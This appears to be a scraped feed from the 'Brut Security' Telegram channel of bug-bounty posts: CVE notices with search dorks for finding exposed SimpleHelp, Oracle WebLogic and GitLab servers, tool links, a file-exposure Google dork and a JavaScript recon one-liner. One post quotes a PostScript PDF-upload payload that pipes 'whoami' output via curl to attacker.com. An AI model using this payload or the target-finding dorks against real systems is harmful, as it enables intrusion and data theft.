Brut Security
14.8K subscribers
941 photos
74 videos
289 files
987 links
โœ…Queries: @wtf_brut
๐Ÿ›ƒWhatsApp: wa.link/brutsecurity
๐ŸˆดTraining: brutsec.com
๐Ÿ“จE-mail: [email protected]
Download Telegram
CVE-2024-57726, -57727, -57728: Multiple vulnerabilities in SimpleHelp, 7.2 - 8.8 ratingโ—๏ธ

The vulnerabilities allow attackers to upload arbitrary files to the SimpleHelp server, as well as escalate privileges, which together allows RCE to be carried out.

Search at Netlas.io:
๐Ÿ‘‰ Link: https://nt.ls/Frx6H
๐Ÿ‘‰ Dork: http.headers.server:"SimpleHelp"

Vendor's advisory: https://simple-help.com/kb---security-vulnerabilities-01-2025#
๐Ÿ‘6
Add the endpoint to your SSRF wordlist
โค14
โšก๏ธSmart contract security report. It contains 2 High, 6 Medium & 8 Low severity issues.

โœ…
https://github.com/gkrastenov/audits/blob/main/solo/SpartaDex-Security-Review.md
โค9๐Ÿ‘2
๐Ÿ—ฟ17
๐Ÿ‘14
Does anyone have Aura+ Songs Playlist ? Do Drop in Comments! Thank You.
๐Ÿคจ4๐Ÿ—ฟ4
โ˜„๏ธRCE On PDF Upload: https://hackerone.com/reports/403417

Content-Disposition: form-data; name="fileToUpload"; filename="pwn.pdf"Content-Type: application/pdf

%!PS
currentdevice null true mark /OutputICCProfile (%pipe%curl
https://attacker.com/?a=$(whoami|base64) ).putdeviceparams
quit
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ8๐Ÿ‘1
โšกWayBackup Finder - A passive way to find backups/ sensitive information.
โš ๏ธhttps://github.com/anmolksachan/WayBackupFinder
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘9โค1
A Visual Guide to Recon
๐Ÿ”ฅ5๐Ÿ‘1
CVE-2025-21535: Server Takeover in Oracle WebLogic, 9.8 rating ๐Ÿ”ฅ

An easily exploitable vulnerability in the Core component allows an unauthenticated attacker to remotely compromise a WebLogic server.

Search at Netlas.io:
๐Ÿ‘‰ Link: https://nt.ls/6EpWK
๐Ÿ‘‰ Dork: protocol:t3 OR protocol:t3s

Vendor's advisory: https://www.oracle.com/security-alerts/cpujan2025.html#AppendixFMW
๐Ÿ‘6๐Ÿซก1
โ˜„๏ธHExHTTP - HExHTTP is a tool designed to perform tests on HTTP headers and analyze the results to identify vulnerabilities and interesting behaviors.

โš ๏ธhttps://github.com/c0dejump/HExHTTP
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘11๐Ÿ”ฅ5โค3
โ–ถ๏ธExplore Bug Bounty POC Videos: https://t.iss.one/brutsecurity_poc
Please open Telegram to view this post
VIEW IN TELEGRAM
Brut Security pinned ยซโ–ถ๏ธExplore Bug Bounty POC Videos: https://t.iss.one/brutsecurity_pocยป
๐Ÿ‘8โค2
New Business Logic POC Video Shared -https://t.iss.one/brutsecurity_poc/9
๐Ÿ”ฅ4โค1
CVE-2025-0314 and other: Multiple vulnerabilities in GitLab, 4.3 - 8.7 ratingโ—๏ธ

In a recent advisory, GitLab writed about three vulnerabilities, including stored XSS, resource exhaustion, and protected CI/CD variables exfiltration.

Search at Netlas.io:
๐Ÿ‘‰ Link: https://nt.ls/BNKS8
๐Ÿ‘‰ Dork: http.favicon.hash_sha256:72a2cad5025aa931d6ea56c3201d1f18e68a8cd39788c7c80d5b2b82aa5143ef OR http.headers.set_cookie:"gitlab" OR http.headers.location:"gitlab"

Vendor's advisory: https://about.gitlab.com/releases/2025/01/22/patch-release-gitlab-17-8-1-released/
๐Ÿค4
โ˜„๏ธInformation Disclosure Dorkโ˜„๏ธ

site:*.example.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘16๐Ÿ”ฅ13โค1
โ–ถ๏ธAutomated JS Endpoint Extraction and Verification with HTTPX and GAU
echo "target.com" | gau --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg \| grep -E "\.js($|\?.*)" \
| httpx -er "(?:(https?|ftp|git|ssh|telnet|smtp|imap|pop3|ldap|sftp|smb|nfs|rtmp|rtsp|ws|wss|irc|news|gopher|rsync|data):\/\/|\/)[^\s\"'\*\(\){};\\\^\$\&<>/\\?#]+(?:\?[^\s\"'<>/\\?#]+)?(?:\/[^\s\"'<>/\\?#]+)*" \-json -mr "application/javascript|text/javascript" \
| jq -r '.extracts[]' | tr -d '[],'
Please open Telegram to view this post
VIEW IN TELEGRAM
โค20๐Ÿ”ฅ16๐Ÿณ1